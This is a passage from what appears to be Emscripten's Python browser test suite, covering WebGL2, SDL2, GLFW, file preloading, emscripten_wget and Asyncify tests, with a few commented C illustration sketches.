['-s', 'OFFSCREEN_FRAMEBUFFER', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
[]]:
if 'OFFSCREENCANVAS_SUPPORT' in mode and os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'):
continue
self.btest_exit(test_file('html5_webgl.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + mode)
@requires_graphics_hardware
def test_webgl2_ubos(self):
self.btest_exit(test_file('webgl2_ubos.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'])
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest_exit(test_file('webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1'])
self.btest_exit(test_file('webgl2_garbage_free_entrypoints.cpp'))
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest_exit(test_file('webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'])
@requires_graphics_hardware
def test_webgl2_runtime_no_context(self):
# tests that if we support WebGL1 and 2, and WebGL2RenderingContext exists,
# but context creation fails, we can then manually try to create a
# WebGL1 context and succeed.
self.btest_exit(test_file('test_webgl2_runtime_no_context.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'])
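# Illustrative sketch (not part of the test suite): the WebGL2->WebGL1 fallback
# that test_webgl2_runtime_no_context exercises can be written against
# <emscripten/html5.h> roughly as follows (assuming the CSS-selector style
# "#canvas" target strings used by current Emscripten):
#
#   #include <emscripten/html5.h>
#
#   EMSCRIPTEN_WEBGL_CONTEXT_HANDLE create_context_with_fallback(void) {
#     EmscriptenWebGLContextAttributes attrs;
#     emscripten_webgl_init_context_attributes(&attrs);
#     attrs.majorVersion = 2;   // try WebGL2 first
#     EMSCRIPTEN_WEBGL_CONTEXT_HANDLE ctx = emscripten_webgl_create_context("#canvas", &attrs);
#     if (ctx <= 0) {
#       attrs.majorVersion = 1; // fall back to WebGL1
#       ctx = emscripten_webgl_create_context("#canvas", &attrs);
#     }
#     return ctx;
#   }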
@requires_graphics_hardware
def test_webgl2_invalid_teximage2d_type(self):
self.btest_exit(test_file('webgl2_invalid_teximage2d_type.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'])
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest_exit(test_file('webgl_with_closure.cpp'), args=['-O2', '-s', 'MAX_WEBGL_VERSION=2', '--closure=1', '-lGL'])
# Tests that -s GL_ASSERTIONS=1 and glVertexAttribPointer with packed types work
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest_exit(test_file('webgl2_draw_packed_triangle.c'), args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2', '-s', 'GL_ASSERTIONS'])
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest_exit(test_file('webgl2_pbo.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'])
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mipmap(self):
self.btest(test_file('third_party/sokol/mipmap-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-O1'],
reference=Path('third_party/sokol', 'mipmap-emsc.png'), reference_slack=2)
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mrt(self):
self.btest(test_file('third_party/sokol/mrt-emcc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=Path('third_party/sokol', 'mrt-emcc.png'))
@requires_graphics_hardware
def test_webgl2_sokol_arraytex(self):
self.btest(test_file('third_party/sokol/arraytex-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=Path('third_party/sokol', 'arraytex-emsc.png'))
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest_exit(test_file('test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'])
def test_wget(self):
create_file('test.txt', 'emscripten')
self.btest_exit(test_file('test_wget.c'), args=['-s', 'ASYNCIFY'])
def test_wget_data(self):
create_file('test.txt', 'emscripten')
self.btest_exit(test_file('test_wget_data.c'), args=['-O2', '-g2', '-s', 'ASYNCIFY'])
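# Illustrative sketch (not part of the test suite): the blocking fetch these
# wget tests rely on only works under -s ASYNCIFY, which suspends main() while
# the underlying XHR completes. A minimal C example, assuming emscripten_wget()
# from <emscripten.h>:
#
#   #include <emscripten.h>
#   #include <stdio.h>
#
#   int main() {
#     emscripten_wget("test.txt", "/test.txt");  // suspends via Asyncify until the download finishes
#     FILE *f = fopen("/test.txt", "r");
#     if (!f) return 1;
#     fclose(f);
#     return 0;
#   }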
@parameterized({
'': ([],),
'es6': (['-s', 'EXPORT_ES6=1'],),
})
def test_locate_file(self, args):
self.set_setting('EXIT_RUNTIME')
for wasm in [0, 1]:
self.clear()
create_file('src.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
printf("|%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return 0;
}
''')
create_file('data.txt', 'load me right before...')
create_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)] + args, reporting=Reporting.JS_ONLY)
ensure_dir('sub')
if wasm:
shutil.move('page.wasm', Path('sub/page.wasm'))
else:
shutil.move('page.html.mem', Path('sub/page.html.mem'))
shutil.move('test.data', Path('sub/test.data'))
self.run_browser('page.html', None, '/report_result?exit:0')
# alternatively, put locateFile in the HTML
print('in html')
create_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP', '-s', 'ASSERTIONS', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)] + args, reporting=Reporting.JS_ONLY)
if wasm:
shutil.move('page.wasm', Path('sub/page.wasm'))
else:
shutil.move('page.html.mem', Path('sub/page.html.mem'))
self.run_browser('page.html', None, '/report_result?exit:' + expected)
in_html('0')
# verify that the mem init request succeeded in the latter case
if not wasm:
create_file('src.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
return result;
}
''')
in_html('200')
@requires_graphics_hardware
@parameterized({
'no_gl': (['-DCLIENT_API=GLFW_NO_API'],),
'gl_es': (['-DCLIENT_API=GLFW_OPENGL_ES_API'],)
})
def test_glfw3(self, args):
for opts in [[], ['-s', 'LEGACY_GL_EMULATION'], ['-Os', '--closure=1']]:
print(opts)
self.btest(test_file('glfw3.c'), args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + args + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(test_file('glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(test_file('glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@requires_graphics_hardware
def test_sdl2_image(self):
# load an image file, get pixel data. Also covers -O2 with --preload-file and memory-init.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
'-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["jpg"]'])
def test_sdl2_key(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
// send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_key.c'), '-o', 'page.html', '-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=_main,_one'])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=_main,_one', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify=0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-s', 'USE_PTHREADS', '-s', 'USE_SDL=2', '-s', 'PROXY_TO_PTHREAD'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure=1', '-g1', '-s', 'LEGACY_GL_EMULATION'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2', '-s', 'INITIAL_MEMORY=64MB'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % read_file('reftest.js'))
create_file('test.html', html)
create_file('data.txt', 'datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
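# Illustrative sketch (not part of the test suite): polling keys via
# SDL_PumpEvents instead of an SDL_PollEvent loop looks roughly like this,
# using only standard SDL2 calls:
#
#   #include <SDL2/SDL.h>
#
#   int key_is_down(SDL_Scancode sc) {
#     SDL_PumpEvents();                               // refresh SDL's internal key state
#     const Uint8 *state = SDL_GetKeyboardState(NULL);
#     return state[sc] != 0;
#   }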
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl2_gl_read.c'), '-o', 'something.html', '-s', 'USE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_glmatrixmode_texture(self):
self.btest('sdl2_glmatrixmode_texture.c', reference='sdl2_glmatrixmode_texture.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='You should see a (top) red-white and (bottom) white-red image.')
@requires_graphics_hardware
def test_sdl2_gldrawelements(self):
self.btest('sdl2_gldrawelements.c', reference='sdl2_gldrawelements.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='GL drawing modes. Bottom: points, lines, line loop, line strip. Top: triangles, triangle strip, triangle fan, quad.')
@requires_graphics_hardware
def test_sdl2_glclipplane_gllighting(self):
self.btest('sdl2_glclipplane_gllighting.c', reference='sdl2_glclipplane_gllighting.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='glClipPlane and GL_LIGHTING emulation. You should see a torus cut open on one side with lighting from one lightsource applied.')
@requires_graphics_hardware
def test_sdl2_glalphatest(self):
self.btest('sdl2_glalphatest.c', reference='sdl2_glalphatest.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='GL_ALPHA_TEST emulation. You should see gradients with different alpha testing modes and reference values.')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = read_file('test.html')
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(test_file('freetype/LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window')
@requires_graphics_hardware
def test_sdl2_ttf_rtl(self):
shutil.copy2(test_file('third_party/notofont/NotoNaskhArabic-Regular.ttf'), self.get_dir())
self.btest('sdl2_ttf_rtl.c', reference='sdl2_ttf_rtl.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'NotoNaskhArabic-Regular.ttf'],
message='You should see colorful "سلام" and "جهان" with shaped Arabic script in the window')
def test_sdl2_custom_cursor(self):
shutil.copyfile(test_file('cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest_exit('sdl2_misc.c', args=['-s', 'USE_SDL=2'])
def test_sdl2_misc_main_module(self):
self.btest_exit('sdl2_misc.c', args=['-s', 'USE_SDL=2', '-s', 'MAIN_MODULE'])
def test_sdl2_misc_via_object(self):
self.run_process([EMCC, '-c', test_file('sdl2_misc.c'), '-s', 'USE_SDL=2', '-o', 'test.o'])
self.compile_btest(['test.o', '-s', 'EXIT_RUNTIME', '-s', 'USE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?exit:0')
@parameterized({
'dash_s': (['-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2'],),
'dash_l': (['-lSDL2', '-lSDL2_mixer'],),
})
@requires_sound_hardware
def test_sdl2_mixer_wav(self, flags):
shutil.copyfile(test_file('sounds/the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-s', 'INITIAL_MEMORY=33554432'] + flags)
@parameterized({
'wav': ([], '0', 'the_entertainer.wav'),
'ogg': (['ogg'], 'MIX_INIT_OGG', 'alarmvictory_1.ogg'),
'mp3': (['mp3'], 'MIX_INIT_MP3', 'pudinha.mp3'),
'mod': (['mod'], 'MIX_INIT_MOD', 'bleep.xm'),
})
@requires_sound_hardware
def test_sdl2_mixer_music(self, formats, flags, music_name):
shutil.copyfile(test_file('sounds', music_name), music_name)
self.btest('sdl2_mixer_music.c', expected='1', args=[
'--preload-file', music_name,
'-DSOUND_PATH=' + json.dumps(music_name),
'-DFLAGS=' + flags,
'-s', 'USE_SDL=2',
'-s', 'USE_SDL_MIXER=2',
'-s', 'SDL2_MIXER_FORMATS=' + json.dumps(formats),
'-s', 'INITIAL_MEMORY=33554432'
])
@no_wasm_backend('cocos2d needs to be ported')
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(ports.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=0',
'--preload-file', preload_file, '--use-preload-plugins',
'-Wno-inconsistent-missing-override'],
message='You should see Cocos2d logo')
def test_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest_exit('browser/async.cpp', args=['-O' + str(opts), '-g2', '-s', 'ASYNCIFY'])
def test_asyncify_tricky_function_sig(self):
self.btest('browser/test_asyncify_tricky_function_sig.cpp', '85', args=['-s', 'ASYNCIFY_ONLY=[foo(char.const*?.int#),foo2(),main,__original_main]', '-s', 'ASYNCIFY=1'])
@requires_threads
def test_async_in_pthread(self):
self.btest_exit('browser/async.cpp', args=['-s', 'ASYNCIFY', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-g'])
def test_async_2(self):
# Error.stackTraceLimit defaults to 10 in Chrome, but this test relies on more
# than 40 stack frames being reported.
create_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest_exit('browser/async_2.cpp', args=['-O3', '--pre-js', 'pre.js', '-s', 'ASYNCIFY'])
def test_async_virtual(self):
for opts in [0, 3]:
print(opts)
self.btest_exit('browser/async_virtual.cpp', args=['-O' + str(opts), '-profiling', '-s', 'ASYNCIFY'])
def test_async_virtual_2(self):
for opts in [0, 3]:
print(opts)
self.btest_exit('browser/async_virtual_2.cpp', args=['-O' + str(opts), '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP', '-profiling', '-s', 'ASYNCIFY'])
# Test async sleeps in the presence of invoke_* calls, which can happen with
# longjmp or exceptions.
@parameterized({
'O0': ([],), # noqa
'O3': (['-O3'],), # noqa
})
def test_async_longjmp(self, args):
self.btest_exit('browser/async_longjmp.cpp', args=args + ['-s', 'ASYNCIFY'])
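# Illustrative sketch (not part of the test suite): one shape of the pattern the
# test above exercises is an Asyncify sleep reached through an invoke_* wrapper,
# e.g. from code that may longjmp (assuming emscripten_sleep from <emscripten.h>):
#
#   #include <emscripten.h>
#   #include <setjmp.h>
#
#   static jmp_buf env;
#
#   static void inner(void) {
#     emscripten_sleep(1);   // unwinds/rewinds the stack via Asyncify
#     longjmp(env, 1);
#   }
#
#   int main() {
#     if (!setjmp(env))
#       inner();             // called via an invoke_* wrapper because of the setjmp above
#     return 0;
#   }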
def test_async_mainloop(self):
for opts in [0, 3]:
print(opts)
self.btest_exit('browser/async_mainloop.cpp', args=['-O' + str(opts), '-s', 'ASYNCIFY'])
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-s', 'ASSERTIONS', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP', '-lSDL', '-s', 'ASYNCIFY'], timeout=90)
def test_mainloop_reschedule(self):
